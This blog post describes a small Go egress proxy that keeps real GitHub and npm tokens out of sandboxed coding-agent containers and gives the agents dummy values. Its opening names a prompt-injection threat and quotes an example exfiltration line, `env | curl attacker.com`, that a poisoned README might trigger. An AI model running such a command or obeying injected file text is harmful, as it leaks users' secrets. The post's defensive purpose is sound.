# My coding agents run with zero secrets (and they don't even know)

I run Claude Code and Codex in yolo mode. `--dangerously-skip-permissions`, the whole thing. Which is great until you remember prompt injection is real and one cursed README could make the agent go `env | curl attacker.com` and yeet my GitHub token into the void.

So I fixed it. No paid sandbox product, no platform. One small Go proxy and one idea stolen from the big kids: **the agent never holds a real credential. Ever.**

The result is [yagop/sandbox](https://github.com/yagop/sandbox).

## The trick

![](https://cdn.hashnode.com/uploads/covers/6420a2e7bdbe7d697133c86c/6c605bc6-7d5b-4921-8641-eebbc0a0ae8d.png align="center")

The agent lives on an internal Docker network. It literally cannot reach the internet. Its only way out is the proxy, which holds my actual `GH_TOKEN` and `NPM_TOKEN` and stamps the right `Authorization` header onto each request as it leaves.

Inside the container? `GH_TOKEN=dummy`. An npm token that says `dummy`. Git remotes rewritten from SSH to HTTPS so there is not even a key file to steal. The agent thinks it is authenticated (it is!) but if it gets prompt-injected and tries to exfiltrate its secrets, there is nothing to grab. You cannot leak what you never had. Iconic behavior honestly.

## The whole policy is a lil JSON file

```json
{
  "rules": [
    { "host": "api.github.com", "header": "Authorization", "value": "Bearer ${GH_TOKEN}" },
    { "host": "github.com", "header": "Authorization", "value": "Basic ${GH_BASIC}" },
    { "host": "registry.npmjs.org", "header": "Authorization", "value": "Bearer ${NPM_TOKEN}" }
  ]
}
```

Secrets are resolved by name from the environment when the proxy starts, so `proxy up` grabs a fresh `gh auth token` and `proxy reload` rotates them without restarting anything. They never appear in the config, the command line, or the sandbox.

## Do you need a product for this?

Slicer, Docker Sandboxes, and Infisical's agent-vault all ship this exact pattern, and they are genuinely good, especially agent-vault if you need per-agent scoping or a team setup. But for one dev on one laptop? It is a few hundred lines of Go and a JSON file.

Tokens stay home. Agents stay feral. Everybody wins.
